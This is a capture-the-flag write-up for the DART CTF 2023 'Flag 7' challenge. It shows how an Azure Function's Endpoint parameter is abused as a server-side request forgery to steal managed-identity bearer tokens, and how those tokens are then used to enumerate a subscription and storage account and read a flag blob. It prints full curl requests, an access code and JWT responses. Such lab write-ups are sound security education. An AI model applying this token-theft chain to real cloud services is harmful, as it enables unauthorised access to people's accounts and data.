> For the complete documentation index, see [llms.txt](https://kabinet.gitbook.io/ctf-writeup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kabinet.gitbook.io/ctf-writeup/2023/dart-ctf/flag-7.md). # Flag 7
The `Deployer App` error message suggested that we must include a query string parameter of `Endpoint`. Using Postman, I made it visit to a requestbin endpoint, but was greeted with a new error message
{% code overflow="wrap" %} ```json {"statusCode":500,"message":"An unexpected error occured while fetching the AAD Token.","correlationId":"d64206c2-b852-4bbd-9938-672ee908b3d6"} ``` {% endcode %} It shows an error fetching an AAD Token, which reminds me of a Cloud SSRF Attack. {% embed url="" %} Referring to HackTricks, I made the `Endpoint=https://management.azure.com` and I am able to retrieve a bearer token. Request {% code overflow="wrap" %} ```bash curl --location 'https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw%3D%3D&Endpoint=https%3A%2F%2Fmanagement.azure.com' ``` {% endcode %} Response {% code overflow="wrap" %} ```json {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzE2MiwibmJmIjoxNjc5ODM3MTYyLCJleHAiOjE2Nzk5MjM4NjIsImFpbyI6IkUyWmdZUGhxcEhreXVzRDh2VXZGZ3A4RnN6M3pBQT09IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJyaCI6IjAuQVh3QWczSklYNDY0M2txQU5YdktyRUZXczBaSWYza0F1dGRQdWtQYXdmajJNQk83QUFBLiIsInN1YiI6IjVkMDRjYzRhLWM2N2QtNDZmOC1hNDU2LTJjZDMxNTc0N2JiYSIsInRpZCI6IjVmNDg3MjgzLWI4OGUtNGFkZS04MDM1LTdiY2FhYzQxNTZiMyIsInV0aSI6Imp2WVlhdFJ2QjAtXzUyNzQ0QUtWQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy83YjliZDkxNi04YmQyLTQ0NDYtOTY3OC04NTMxZWY2NjNlZGIvcmVzb3VyY2Vncm91cHMvREFSVE1pc3Npb24vcHJvdmlkZXJzL01pY3Jvc29mdC5XZWIvc2l0ZXMvUk9TQXJyYXkiLCJ4bXNfdGNkdCI6MTY3ODg3NTYxMn0.L3CVBYSqNH1TO4YweUhNDnxFkF3K_mXcS1NEmQkMlPH1CKoy0mKY83bgg9G4ajZvts4hckI8KUU9mT3Fs-i8lPtlismbgkJdW_ZBgFexAA_0FRtJTXWerwe4x69Zr6Yw8FNNPii0YK-h1intntm-D96XSOri21DrCztoyLOaxTPMTt0jk-Oy491ohIYI36j6A2d_EQOXygrLc-7AzjM6ooAftsYqzLhUjKq3xAG1OAo5bT_ewYqmZKH8ZXTzsn27zwdbpfv86BrVevb6vZ5FlDuF9DG5jI-Iu1OO_U9SnKb3riprZTbq4EDXD_AWnXFli_WBsWWtYpa_FF24hgcK1w","expires_on":"03/27/2023 13:31:01 +00:00","resource":"https://management.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"} ``` {% endcode %} Referring to [Azure Documentation](https://learn.microsoft.com/en-us/rest/api/resources/resources/list) and this [github url](https://raw.githubusercontent.com/PacktPublishing/Penetration-Testing-Azure-for-Ethical-Hackers/main/chapter-5/tokenexploit.sh), I used Postman to perform further enumeration of the permission. {% embed url="" %} I first retrieved the subscription ID by requesting `https://management.azure.com/subscriptions?api-version=2020-01-01` Request ```bash curl --location 'https://management.azure.com/subscriptions?api-version=2020-01-01' \ --header 'Authorization: Bearer ${token}' \ --header 'x-ms-version: 2017-11-09' ``` Response ```json { "value": [ { "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb", "authorizationSource": "RoleBased", "managedByTenants": [], "subscriptionId": "7b9bd916-8bd2-4446-9678-8531ef663edb", "tenantId": "5f487283-b88e-4ade-8035-7bcaac4156b3", "displayName": "dartsub", "state": "Enabled", "subscriptionPolicies": { "locationPlacementId": "Public_2014-09-01", "quotaId": "PayAsYouGo_2014-09-01", "spendingLimit": "Off" } } ], "count": { "type": "Total", "value": 1 } } ``` Then I attempt to retrieve a list of resources that the current user has access to. Request {% code overflow="wrap" %} ```bash curl --location 'https://management.azure.com/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resources?api-version=2019-10-01' \ --header 'Authorization: Bearer ${token}' \ --header 'x-ms-version: 2017-11-09' ``` {% endcode %} Response ```json5 { "value": [ { "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resourceGroups/DARTMission/providers/Microsoft.Storage/storageAccounts/coresat", "name": "coresat", "type": "Microsoft.Storage/storageAccounts", "sku": { "name": "Standard_LRS", "tier": "Standard" }, "kind": "StorageV2", "location": "eastus", "tags": {} } ] } ``` I identify that the user has access to a storage account named `coresat`. To perform further enumeration on the storage account, I will need to request a `storage account` bearer token. Keeping in mind that the current bearer token is for `management`. Request {% code overflow="wrap" %} ```bash curl --location https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw==&Endpoint=https://storage.azure.com ``` {% endcode %} Response {% code overflow="wrap" %} ```json {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL3N0b3JhZ2UuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzMzNSwibmJmIjoxNjc5ODM3MzM1LCJleHAiOjE2Nzk5MjQwMzUsImFpbyI6IkUyWmdZSGdjUHBzLzRmaWxTd0t5Q1ZzK1Q3Z2ZDd0E9IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwib2lkIjoiNWQwNGNjNGEtYzY3ZC00NmY4LWE0NTYtMmNkMzE1NzQ3YmJhIiwicmgiOiIwLkFYd0FnM0pJWDQ2NDNrcUFOWHZLckVGV3M0R21CdVRVODZoQ2tMYkNzQ2xKZXZHN0FBQS4iLCJzdWIiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJ0aWQiOiI1ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMiLCJ1dGkiOiJWNUNYeHhBMWFVS1huZ1VSdG1na0FRIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvN2I5YmQ5MTYtOGJkMi00NDQ2LTk2NzgtODUzMWVmNjYzZWRiL3Jlc291cmNlZ3JvdXBzL0RBUlRNaXNzaW9uL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL1JPU0FycmF5In0.KDEdC4IihcUOMWIpdgg1kZy3DtJirpirE1yL91Hc90YebkP_6tUcq-2zzSqo470AFyuAeht5hTsYgGClQj8xJPsAZckZG8SUWPBSCSoBXeP-29stnEhSkM6XOUf_wbPEtxM7IDgGaK9MboufCm5y4_un1_dg3BCqqacaQLBtBUoTiPG5Nfu1uBnK_Duy8g_e2XDLOSjaBUZIB4T1-mVlN6PnQciTHmhKGJdz1Mf-dL7yz8YCg0Yfzr7Iao6wel5XuIceT9TU7jQrgsXAKYkHU_zF5ETJG45IGm4KV_xCQCZg-SGfSbu1SGwqIJtS5rj6pplmwfqRZvC_eGwo3pENAA","expires_on":"03/27/2023 13:33:55 +00:00","resource":"https://storage.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"} ``` {% endcode %} Next I refer to this [documentation](https://learn.microsoft.com/en-us/rest/api/storageservices/) to further enumerate the storage account. {% embed url="" %} Request ```bash curl --location 'https://coresat.blob.core.windows.net/?comp=list' \ --header 'Authorization: Bearer ${token}' \ --header 'x-ms-version: 2017-11-09' ``` Response ```xml datahandling Wed, 15 Mar 2023 14:38:57 GMT "0x8DB256302872266" unlocked available false false ``` Now that we have the container name `datahandling`, we can enumerate the blobs within the container, referring to this [article](https://learn.microsoft.com/en-us/rest/api/storageservices/list-blobs?tabs=azure-ad). {% embed url="" %} Request {% code overflow="wrap" %} ```bash curl --location 'https://coresat.blob.core.windows.net/datahandling?restype=container&comp=list' \ --header 'Authorization: Bearer ${token}' \ --header 'x-ms-version: 2017-11-09' ``` {% endcode %} Response {% code overflow="wrap" %} ```xml Flag7.txt Fri, 17 Mar 2023 09:51:14 GMT Fri, 17 Mar 2023 09:51:14 GMT 0x8DB26CD25E0F3A3 47 text/plain d1UOmf3KFXonNzNJvZB+5Q== BlockBlob Hot true unlocked available true LORRI-Cert.txt Wed, 15 Mar 2023 14:39:51 GMT Wed, 15 Mar 2023 14:39:51 GMT 0x8DB256322B11B97 6998 application/octet-stream 19wxEVC9dZDYVVICu9JmtQ== BlockBlob Hot true unlocked available true ``` {% endcode %} There are 2 blob in the container, namely `Flag7.txt` and `LORRI-Cert.txt` Retrieving the Flag7.txt gives me the flag. Request ```bash curl --location 'https://coresat.blob.core.windows.net/datahandling/Flag7.txt' \ --header 'Authorization: Bearer ${token}' \ --header 'x-ms-version: 2017-11-09' ``` Response ```json Flag 7 : All systems are functioning normally. ``` Flag 7 : All systems are functioning normally. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://kabinet.gitbook.io/ctf-writeup/2023/dart-ctf/flag-7.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.